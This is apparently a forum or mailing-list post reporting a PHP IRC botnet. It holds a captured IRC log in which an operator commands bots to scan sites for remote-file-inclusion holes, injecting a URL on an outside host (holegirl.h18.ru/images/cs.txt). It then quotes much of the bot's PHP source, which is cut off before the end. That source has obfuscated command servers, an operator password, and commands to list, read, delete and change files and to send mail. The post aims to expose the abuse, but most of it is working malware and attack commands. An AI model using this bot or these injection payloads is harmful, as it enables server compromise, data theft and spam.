202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?shout=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?shoutbox=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?song==http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?song==http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?song=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?trk=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php listen.pls? /listen.pls?track=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout
----------------- END -------------------
Please, make your decisions, and help to stop this idiocy.
Thank You,
Ivan
PS: If you think they should be busted and punished, feel free to pass
this info to appropriate authorities. :)
> [cs.new.txt]<?
> set_time_limit(0);
> ini_set("max_execution_time",0);
> set_magic_quotes_runtime(0);
> ini_set('output_buffering',0);
> error_reporting(0);
> ignore_user_abort();
> $settings = array
> (
> "port" => 8080,
> "serverpassword" => "qdDN3pjgpsvfpw==", //secretpass
> "channel" => "WY7a", //##p
> "channel_password" => "o8+f1JTfng==", //md5hash
> "hostaddress_ereg" => "OiohKkAqLmF2", //:*!*@*.av
> "ha" => "OiohKkAqLmF2", //
> "bot_password" => "9dd4e461268c8034f5c8564e155c67a6",
> /**This is irc-bot password 9dd4e461268c8034f5c8564e155c67a6
> *login is in a PRIVMSG to a bot "* 9dd4e461268c8034f5c8564e155c67a6" but your hostaddress must match the ":*!*@*.av" ereg
> *basically you just need to have 'av' in your hostname, the :*!*@ part is just IRC name/nick and * and . matches anything.
> **/
> "tr" => "*",
> "length_nick_user" => 9,
> "mode" => "LXggaQ==", //-x i
> "ctcp_version" => "bUlSQyA2LjIxIEJZIEtoYWxlZCBNYXJkYW0tQmF5" //mIRC 6.21 BY Khaled Mardam-Ba
> );
>
> function Trimming($string) {
> $string = str_replace(" ", "", $string);
> return $string;}
>
> function Base64Decode($string) {
> $string = base64_decode(Trimming($string));
> return $string;}
>
> function RunApplication() {
> global $settings;
> $nee11cbb1 = array();
> $nothing = "";
> $servers = array("rdCd2p/RqtLYldmZZOGY0c6jqZqWo9k=", "ptjf2qjarMzRptmqo5iq0c+ZpN9hl9vY", "rdDM2p/Uqt7cZONlZOGY0c6jqZqWo9k=", "pN6bnGHbpt7hp5mjqw==", "pN6bnWHbpt7hp5mjqw==", "pN6bnmHbpt7hp5mjqw==", "pN6bn2Hbpt7hp5mjqw==", "npvdnKacZuHRZN1lrZqqms2fmJqhmeA=", "mpvOnKbWqc7Wn9Wgopyd39SgmtKmmNKZzdDOldnP2A==", "pp7a45jen9nhq9CnaJ1nnp1poNebn9bT1NHfz8/Lks/dzJnamt4=", "Zp2Y3KXVrN3RpuGaqJiW29c=", "ppnX5ZnbpczNppmepNCi");
> /**
> Servers are:
> we3nlethland.weedns.com
> pmununvbernum.weedns.com
> webnlhttp0x0.weedns.com
> ns10.optus.nu
> ns11.optus.nu
> ns12.optus.nu
> ns13.optus.nu
> h0s0s00we0r0w0w.cjb.net
> d0d0sjsdjkjkl2jsjkdfsdf.cjb.net
> p3pweriouwer234234jkhkjhjkshda.cjb.net
> 02.privserver.com
> p.myfoobar.info
>
> REMEMBER TO USE PORT 8080 AND SERVER PASSWORD OF 'secretpass' TO CONNECT!
> **/
> shuffle($servers);
> if(($connection = fsockopen(DecryptString($servers[0]),$settings['port'],$h70106d0d,$x809b1abe,15))) {
> $irc_name = RandomName($settings['length_nick_user']);
> if (strlen($settings['sp'])>0) {
> SendData($connection, "PASS ".DecryptString($settings['sp']));}
>
> SendData($connection, "USER ".RandomCharacters($settings['length_nick_user'])." 127.0.0.1 localhost :$irc_name");
> SendData($connection, "NICK $irc_name");
> while (!feof($connection)) {
> $trimmed_connection = trim(fgets($connection,512));
> $RecievedDataString = explode(" ",$trimmed_connection);
> if(($trimmed_connection == $nothing)) continue;
> if (isset($RecievedDataString[0]) && $RecievedDataString[0] == "PING") {
> SendData($connection, "PONG ".$RecievedDataString[1]);}
>
> else if (isset($RecievedDataString[1]) && $RecievedDataString[1] == 001) {
> SendData($connection, "MODE $irc_name ".Base64Decode($settings['mode']));
> SendData($connection, "JOIN ".DecryptString($settings['channel'])." ".DecryptString($settings['channel_password']));}
>
> else if(isset($data_array[1]) && $data_array[1] == 433)
> {
> SendData($connection, "NICK $irc_name");}
>
> else if (isset($RecievedDataString[1]) && isset($nee11cbb1[$RecievedDataString[1]])) {
> unset($nee11cbb1[$RecievedDataString[1]]);}
>
> else if (isset($RecievedDataString[1]) && ($RecievedDataString[1] == "PRIVMSG" || $RecievedDataString[1] == 332)) {
> $data = strstr($trimmed_connection," :");
> $data = substr($data,2);
> $data_array = explode(" ",$data);
> $sender_details = $RecievedDataString[0];
> $ctcp_sender = explode("!",$sender_details);
> $ctcp_sender = substr($ctcp_sender[0],1);
> $is_bot_admin = FALSE;
> if ($data_array[0] == "\1VERSION\1") {
> SendData($connection,"NOTICE ".$ctcp_sender." :\1VERSION ".Base64Decode($settings['ctcp_version'])."\1");
> }
> for ($count=0;$count<count($data_array);$count++) {
> if($data_array[$count] == "-s") {
> $is_bot_admin = TRUE;
> }
> }
> if ($RecievedDataString[1] == 332) {
> $other_nick = $RecievedDataString[3];
> }
> elseif ($RecievedDataString[2] == $irc_name) {
> $other_nick = $ctcp_sender;
> } else {
> $other_nick = $RecievedDataString[2];
> }
> if ($data_array[0] == PHP_OS) {
> array_shift($data_array);
> }
> if (substr($data_array[0],0,1) == $settings['tr']) {
> if (isset($nee11cbb1[$sender_details]) || $RecievedDataString[1] == "332") {
> switch (substr($data_array[0],1)) {
> case "lo":
> if ($RecievedDataString[1] != 332) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "out");}
>
> break;
> case "d1enow":
> SendData($connection, "QUIT :I QUIT");
> fclose($connection);
> exit(0);
> break;
> case "raw":
> if (count($data_array)>1) {
> SendData($connection, substr($data,strlen($data_array[0])));}
>
> break;
> case "ls":
> if (isset($data_array[1])) {
> $h954eef6d = $data_array[1];} else {
>
> $h954eef6d = getcwd();}
>
> if (is_dir($h954eef6d)) {
> if (($b73600783 = opendir($h954eef6d))) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Dir// Now listing: \2".$h954eef6d."\2");
> while (($v435ed7e9 = readdir($b73600783)) !== FALSE) {
> if ($v435ed7e9 != "." && $v435ed7e9 != "..") {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "> (".filetype($h954eef6d."/".$v435ed7e9).") $v435ed7e9");
> sleep(1);}
> }
> closedir();
> } else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Dir// Unable to list contents of \2".$h954eef6d."\2");}
> } else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Dir// \2".$h954eef6d."\2 is not a dir!");}
>
> break;
> case "cat":
> if (count($data_array) > 1) {
> if (is_file($data_array[1])) {
> if (($f0666f0ac = fopen($data_array[1],"r"))) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CAT// Now reading file: \2".$data_array[1]."\2");
> while(!feof($f0666f0ac)) {
> $b6438c669 = trim(fgets($f0666f0ac,256));
> PrivateMessage($connection, $is_bot_admin, $other_nick, "> $b6438c669");
> sleep(1);}
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "> [EOF]");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CAT// Couldn't open \2".$data_array[1]."\2 for reading.");}
> } else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CAT// \2".$data_array[1]."\2 is not a file");}
> }
>
> break;
> case "pwd":
> PrivateMessage($connection, $is_bot_admin, $other_nick, "PWD// Current dir: ".getcwd());
> break;
> case "cd":
> if (count($data_array) > 1) {
> if (chdir($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CD// Changed dir to ".$data_array[1]);} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CD// Failed to change dir");}
> }
>
> break;
> case "rm":
> if (count($data_array) > 1) {
> if (unlink($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "RM// Deleted \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "RM// Failed to delete \2".$data_array[1]."\2");}
> }
>
> break;
> case "touch":
> if (count($data_array) > 1) {
> if (touch($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Touch// Touched \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Touch// Failed to touch \2".$data_array[1]."\2");}
> }
>
> break;
> case "symlink":
> if (count($data_array) > 2) {
> if (symlink($data_array[1],$data_array[2])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "SymLink// Symlinked \2".$data_array[2]."\2 To \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "SymLink// Failed to link \2".$data_array[2]."\2 To \2".$data_array[1]."\2");}
> }
>
> break;
> case "chown":
> if (count($data_array) > 2) {
> if (chown($data_array[1],$data_array[2])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Chown// Chowned \2".$data_array[1]."\2 To \2".$data_array[2]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Chown// Failed to chown \2".$data_array[1]."\2 To \2".$data_array[2]."\2");}
> }
>
> break;
> case "chmod":
> if (count($data_array) > 2) {
> if(chmod($data_array[1],$data_array[2])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Chmod// Chmodded \2".$data_array[1]."\2 with permissions \2".$data_array[2]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Chmod// Failed to chmod \2".$data_array[1]."\2");}
> }
>
> break;
> case "mkdir":
> if (count($data_array) > 1) {
> if (mkdir($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "MKDir// Created directory \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "MKDir// Failed to create directory \2".$data_array[1]."\2");}
> }
>
> break;
> case "rmd":
> if (count($data_array)>1) {
> if (rmdir($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "RMDir// Removed directory \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "RMDir// Failed to remove directory \2".$data_array[1]."\2");}
> }
>
> break;
> case "cp":
> if (count($data_array) > 2) {
> if (copy($data_array[1], $data_array[2])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CP// Copied \2".$data_array[1]."\2 to \2".$data_array[2]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CP// Failed to copy \2".$data_array[1]."\2 to \2".$data_array[2]."\2");}
> }
>
> break;
> case "mail":
> if (count($data_array)>4) {
> $y099fb995 = "From: <".$data_array[2].">\r\n";
> if (mail($data_array[1], $data_array[3], substr($data,$data_array[4]), $y099fb995)) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Mailer// Message sent to \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Mailer// Send failure");}
> }
>
> break;
> case "mkmd5":
> PrivateMessage($connection, $is_bot_admin, $other_nick, "MD5// ".md5($data_array[1]));
> break;
> case "dns":
> if (isset($data_array[1])) {
> $p957b527b = explode(".",$data_array[1]);
> if (count($p957b527b)==4 && is_numeric($p957b527b[0]) && is_numeric($p957b527b[1]) && is_numeric($p957b527b[2]) && is_numeric($p957b527b[3])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "DNS// ".$data_array[1]." -> ".gethostbyaddr($data_array[1]));
>
> }
>
> ...
>
> продолжение